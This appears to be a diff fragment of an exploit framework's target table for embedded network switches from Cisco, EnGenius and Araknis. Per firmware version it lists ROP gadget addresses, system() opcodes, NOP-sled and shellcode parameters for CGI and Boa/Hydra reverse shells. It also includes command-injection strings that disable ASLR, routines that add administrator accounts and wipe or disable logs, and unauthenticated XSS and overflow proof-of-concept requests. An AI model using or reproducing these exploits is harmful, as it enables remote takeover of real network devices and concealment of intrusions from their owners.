+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x42E474,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x42D25c,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'START':0x7ffeee04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 45,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Cisco Systems, Inc.
+			# Sx220 Series
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'225-51973': {
+				'template':'Cisco',						# Static for the vendor
+				'version':'1.1.3.1',					# Version / binary dependent stuff
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40F70C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484683c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi/set.cgi;  cgi_sys_ping_set()
+						# Ping IPv4
+						'web_sys_ping_post':0x43535C,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
+						'sys_ping_post_check':'',
+
+														# /sqfs/home/web/cgi/set.cgi;  cgi_sys_tracert_set()
+						# traceroute
+						#'web_sys_ping_post':0x43567C,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						#'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
+						#'sys_ping_post_check':'',
+
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
+						'log_settings_set':0x436FDC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
+						'log_ramClear':0x436F34,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
+						'log_fileClear':0x436F88,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
+						'sys_timeSntp_set':0x434FB0,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
+						'sys_timeSntpDel_set':0x4350D8,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
+						'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+			'225-60080': {
+				'template':'Cisco',						# Static for the vendor
+				'version':'1.1.4.1',					# Version / binary dependent stuff
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40ffac,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998530,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x24847b6c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi/set.cgi;  cgi_sys_ping_set()
+						# Ping IPv4
+						'web_sys_ping_post':0x43535C,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
+						'sys_ping_post_check':'',
+
+														# /sqfs/home/web/cgi/set.cgi;  cgi_sys_tracert_set()
+						# traceroute
+						#'web_sys_ping_post':0x43567C,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						#'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
+						#'sys_ping_post_check':'',
+
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
+						'log_settings_set':0x436FDC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
+						'log_ramClear':0x436F34,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
+						'log_fileClear':0x436F88,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
+						'sys_timeSntp_set':0x434FB0,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
+						'sys_timeSntpDel_set':0x4350D8,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
+						'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# EnGenius Technologies, Inc.
+			# EGS series
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'14044-509': {
+				'template':'EnGenius',						# Static for the vendor
+				'version':'1.05.20_150810-1754',					# Version / binary dependent stuff
+				'model':'EGS2110P',				# Model
+				'uri':'https://www.engeniustech.com/engenius-products/8-port-gigabit-smart-switch-egs2110p/',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E12C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248405a0,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
+						# traceroute
+						'web_sys_ping_post': 0x42382C,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
+						'sys_ping_post_check':'',
+						'verify_uri':'/conf_tmp/check',
+
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_add_account': {
+						# pt: 0 = no password, 1 = cleartext, 2 = encrypted
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x423E74,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',			# Admin, priv 15
+						'vulnerable': True,
+					},
+					'stack_cgi_del_account': {
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x423E74,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pt=2&pv=0&op=0',		# 
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
+						'log_settings_set':0x43DE18,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_ramClear':0x43F934,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_fileClear':0x43F934,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSntp_set':0x424844,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
+						'sys_timeSntpDel_set':0x424844,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
+						'sys_timeSettings_set':0x424844,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
+						'START':0x100181A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# EnGenius Technologies, Inc.
+			# EWS series
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'14044-32589': {
+				'template':'EnGenius',						# Static for the vendor
+				'version':'1.06.21_c1.8.77_180906-0716',					# Version / binary dependent stuff
+				'model':'EWS1200-28TFP',				# Model
+				'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',
+				'verify': { 
+						'cpl_locallogin.cgi (XSS)': {
+							'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
+							'authenticated': False,
+							'response':'xss',
+							'Content-Type':False,
+							'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',
+							'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.captivePortal.login (XSS)': {
+							'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
+							'authenticated': False,
+							'response':'xss',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
+							'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'cpl_logo_ul.cgi': {
+							'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
+							'authenticated': False,
+							'response':'json',
+							'Content-Type':False,
+							'uri':'/cgi-bin/cpl_logo_ul.cgi',
+							'content':'Content-Disposition: filename.png\n------',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'cpl_locallogin.cgi': {
+							'description':'Stack overflow in "username/password (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',
+							'content':'username=admin&password=' + self.random_string(196),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.captivePortal.login': {
+							'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
+							'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.jrpc.dispatch.cgi': {
+							'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',
+							'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.captivePortal.auth': {
+							'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
+							'content':'',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E15C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x24840690,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
+						'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						# pt: 0 = no password, 1 = cleartext, 2 = encrypted
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x42D1D4,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',			# Admin, priv 15
+						'vulnerable': True,
+					},
+					'stack_cgi_del_account': {
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x42D1D4,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pt=2&pv=0&op=0',		# 
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
+						# traceroute
+						'web_sys_ping_post': 0x42CB8C,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
+						'sys_ping_post_check':'',
+						'verify_uri':'/conf_tmp/check',
+
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
+						'log_settings_set':0x4494E8,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_ramClear':0x44B0C0,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_fileClear':0x44B0C0,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSntp_set':0x42E438,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
+						'sys_timeSntpDel_set':0x42E438,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
+						'sys_timeSettings_set':0x42E438,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
+						'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
+						'START':0x100271A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+			'14044-44104': {
+				'template':'EnGenius',						# Static for the vendor
+				'version':'1.07.22_c1.9.21_181018-0228',					# Version / binary dependent stuff
+				'model':'EWS1200-28TFP',				# Model
+				'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',
+				'verify': { 
+						'cpl_locallogin.cgi (XSS)': {
+							'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
+							'authenticated': False,
+							'response':'xss',
+							'Content-Type':False,
+							'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',
+							'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.captivePortal.login (XSS)': {
+							'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
+							'authenticated': False,
+							'response':'xss',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
+							'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'cpl_logo_ul.cgi': {
+							'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
+							'authenticated': False,
+							'response':'json',
+							'Content-Type':False,
+							'uri':'/cgi-bin/cpl_logo_ul.cgi',
+							'content':'Content-Disposition: filename.png\n------',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'cpl_locallogin.cgi': {
+							'description':'Stack overflow in "username/password (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',
+							'content':'username=admin&password=' + self.random_string(196),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.captivePortal.login': {
+							'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
+							'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.jrpc.dispatch.cgi': {
+							'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',
+							'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'sn.captivePortal.auth': {
+							'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
+							'content':'',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E15C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x24840690,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
+						'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						# pt: 0 = no password, 1 = cleartext, 2 = encrypted
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x42C334,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',			# Admin, priv 15
+						'vulnerable': True,
+					},
+					'stack_cgi_del_account': {
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x42C334,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pt=2&pv=0&op=0',		# 
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
+						# traceroute
+						'web_sys_ping_post': 0x42BCEC,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
+						'sys_ping_post_check':'',
+						'verify_uri':'/conf_tmp/check',
+
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
+						'log_settings_set':0x448008,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_ramClear':0x449BE0,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_fileClear':0x449BE0,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSntp_set':0x42D598,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSntpDel_set':0x42D598,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSettings_set':0x42D598,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
+						'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
+						'START':0x100271A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Araknis Networks
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'8028-89928': {
+				'template':'Araknis',					# Static for the vendor
+				'version':'1.2.00_171225-1618',			# Version / binary dependent stuff
+				'model':'AN-310-SW-16-POE',				# Model
+				'uri':'http://araknisnetworks.com/',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E04C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x24840470,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
+						'safe': False, 					# Boa/Hydra restart/watchdog, False = no restart, True = restart
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
+						# traceroute
+						'web_sys_ping_post': 0x42A494,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&session_uid=0&uid=0',
+						'sys_ping_post_check':'',
+						'verify_uri':'/conf_tmp/check',
+
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_add_account': {
+														# /sqfs/home/web/cgi/set.cgi;  sn_EncrypOnly_user_mngSet()
+						'address':0x4303B4,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',			# Admin, priv 15
+						'vulnerable': True,
+					},
+					'stack_cgi_del_account': {
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x42ADB8,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pw=&pv=0&op=0',		# 
+						'vulnerable': True,				# user
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
+						'log_settings_set':0x44DBD8,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_ramClear':0x44FC88,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_fileClear':0x44FC88,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
